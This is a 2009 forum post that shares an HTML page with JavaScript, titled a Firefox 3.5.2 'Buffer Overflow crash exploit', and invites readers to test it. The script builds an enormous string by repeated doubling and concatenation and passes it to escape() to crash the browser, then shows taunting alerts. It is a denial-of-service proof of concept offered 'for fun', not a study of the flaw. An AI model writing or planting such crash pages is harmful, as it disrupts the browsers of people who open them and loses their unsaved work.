Does this code crash your Firefox?
Date: August 14, 2009 03:40PM
I write a code; but for me work, for the pc of my friend no: why?
tested on : WinXP Sp2 + Mozilla FIreFox 3.5.2 <= WORK
tested on: WinXP sp3 + MOzilla FIrefox 3.5 <= not work
it's true>? test by yuorself
code:
<html>
<head>
<title> [~] bUt Work? MOzilla Firefox 3.5.2 <= (char) Buffer Overflow crash exploit</title>
</head>
<script type="text/javascript">
var x=String.fromCharCode(120);
var a="";
var b="";
for(i=0;i<1024;i++)
{a=a+x;}
for(i=0;i<1024;i++)
{b=b+a;}
var c=x;
for(i=0;i<27;i++) c += c;
for(i=0;i<88;i++) c += b;
alert("G00d Bye!");
var thxstaker=escape(c); // :) a little bit..
alert(navigator.useragent);
alert('...');
alert('yes, the browser suck!')
</script>
<br>
Only For fun..
<br>
@ XaDoS August ~ 2009
</html>
Edited 4 time(s). Last edit at 08/18/2009 08:10AM by Pavlovrm.